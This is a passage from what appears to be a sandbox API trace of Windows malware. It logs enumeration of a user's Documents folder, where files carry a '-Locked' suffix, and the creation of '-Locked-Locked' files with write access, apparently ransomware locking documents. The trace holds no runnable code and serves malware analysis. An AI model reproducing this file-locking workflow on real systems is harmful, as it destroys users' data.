nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0300.255] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.255] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0300.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af194) returned 1 [0300.255] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0300.256] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0300.256] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*", lpFindFileData=0x1aeebc | out: lpFindFileData=0x1aeebc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4e6a95a, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x32c871d4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.256] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4e6a95a, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x32c871d4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.256] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ab3ab5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ab3ab5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ab3ab5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked", cAlternateFileName="1FEG~2.XLS")) returned 1 [0300.259] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ace7f4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ace7f4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ace7f4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked", cAlternateFileName="2XKT2-~2.PPT")) returned 1 [0300.259] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ae0e22, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ae0e22, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ae0e22, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked", cAlternateFileName="4YEBKI~2.XLS")) returned 1 [0300.259] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32af1d8c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32af1d8c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32af1d8c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked", cAlternateFileName="4GH0Y9~1.PDF")) returned 1 [0300.259] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b00832, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b00832, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b00832, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked", cAlternateFileName="88Z1O5~2.DOC")) returned 1 [0300.259] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b119bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b119bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b119bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked", cAlternateFileName="9WUI5E~2.DOC")) returned 1 [0300.259] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b22d39, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b22d39, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b22d39, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked", cAlternateFileName="AWNRFZ~2.PPT")) returned 1 [0300.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b3156b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b3156b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b3156b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked", cAlternateFileName="AZYKAG~2.RTF")) returned 1 [0300.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b474bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b474bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b474bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked", cAlternateFileName="BFC~2.DOC")) returned 1 [0300.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b55fb6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b55fb6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b55fb6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked", cAlternateFileName="CERXR1~2.XLS")) returned 1 [0300.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b63866, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b63866, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b63866, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0300.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b72239, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b72239, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b72239, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked", cAlternateFileName="EUNC2M~2.XLS")) returned 1 [0300.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b831b0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32b831b0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32b831b0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked", cAlternateFileName="FQNOQA~2.XLS")) returned 1 [0300.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ba8fd6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32ba8fd6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32ba8fd6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked", cAlternateFileName="FUKBCY~2.PPT")) returned 1 [0300.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bc16b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bc16b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bc16b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked", cAlternateFileName="HBFGJD~1.DOC")) returned 1 [0300.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd1558, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bd1558, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bd1558, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked", cAlternateFileName="HUM71H~2.PDF")) returned 1 [0300.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i3bdpGM-nK_y", cAlternateFileName="I3BDPG~1")) returned 1 [0300.262] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32be4c72, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32be4c72, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32be4c72, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked", cAlternateFileName="JOED-0~2.PPT")) returned 1 [0300.262] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bf97aa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32bf97aa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32bf97aa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked", cAlternateFileName="JYYUHN~2.OTS")) returned 1 [0300.262] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0300.262] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0300.262] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0300.263] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c09621, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c09621, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c09621, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked", cAlternateFileName="NYMPGD~2.DOC")) returned 1 [0300.263] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c1a8b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c1a8b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c1a8b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked", cAlternateFileName="O4ACLZ~2.DOC")) returned 1 [0300.263] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x65ef9a5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0300.263] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c3a4ac, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c3a4ac, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c3a4ac, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked", cAlternateFileName="PA5CSH~2.DOC")) returned 1 [0300.263] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uuXtJUWZmGeM k7fGnf", cAlternateFileName="UUXTJU~1")) returned 1 [0300.264] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c48e1b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c48e1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c48e1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked", cAlternateFileName="W7ZBDB~2.PPT")) returned 1 [0300.264] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c5a17a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c5a17a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c5a17a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked", cAlternateFileName="YPCZCD~2.PPT")) returned 1 [0300.264] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c6ff73, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c6ff73, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c6ff73, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked", cAlternateFileName="ZBHJ~1.PDF")) returned 1 [0300.265] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c7d5f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c7d5f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c7d5f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked", cAlternateFileName="ZFNXJ8~2.DOC")) returned 1 [0300.265] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.265] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0300.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af160) returned 1 [0300.265] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked", lpFilePart=0x0) returned 0x30 [0300.265] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x37 [0300.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.266] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.266] GetFileType (hFile=0x49c) returned 0x1 [0300.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.266] GetFileType (hFile=0x49c) returned 0x1 [0300.268] CloseHandle (hObject=0x49c) returned 1 [0300.268] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked", lpFilePart=0x0) returned 0x36 [0300.268] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3d [0300.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.269] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.269] GetFileType (hFile=0x49c) returned 0x1 [0300.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.269] GetFileType (hFile=0x49c) returned 0x1 [0300.271] CloseHandle (hObject=0x49c) returned 1 [0300.271] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked", lpFilePart=0x0) returned 0x38 [0300.271] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x3f [0300.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.271] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.272] GetFileType (hFile=0x49c) returned 0x1 [0300.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0300.272] GetFileType (hFile=0x49c) returned 0x1 [0300.273] CloseHandle (hObject=0x49c) returned 1 [0300.273] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked", lpFilePart=0x0) returned 0x31 [0300.273] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked", lpFilePart=0x0) returned 0x38 [0300.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0300.274] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.274] GetFileType (hFile=0x49c) returned 0x1 [0300.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 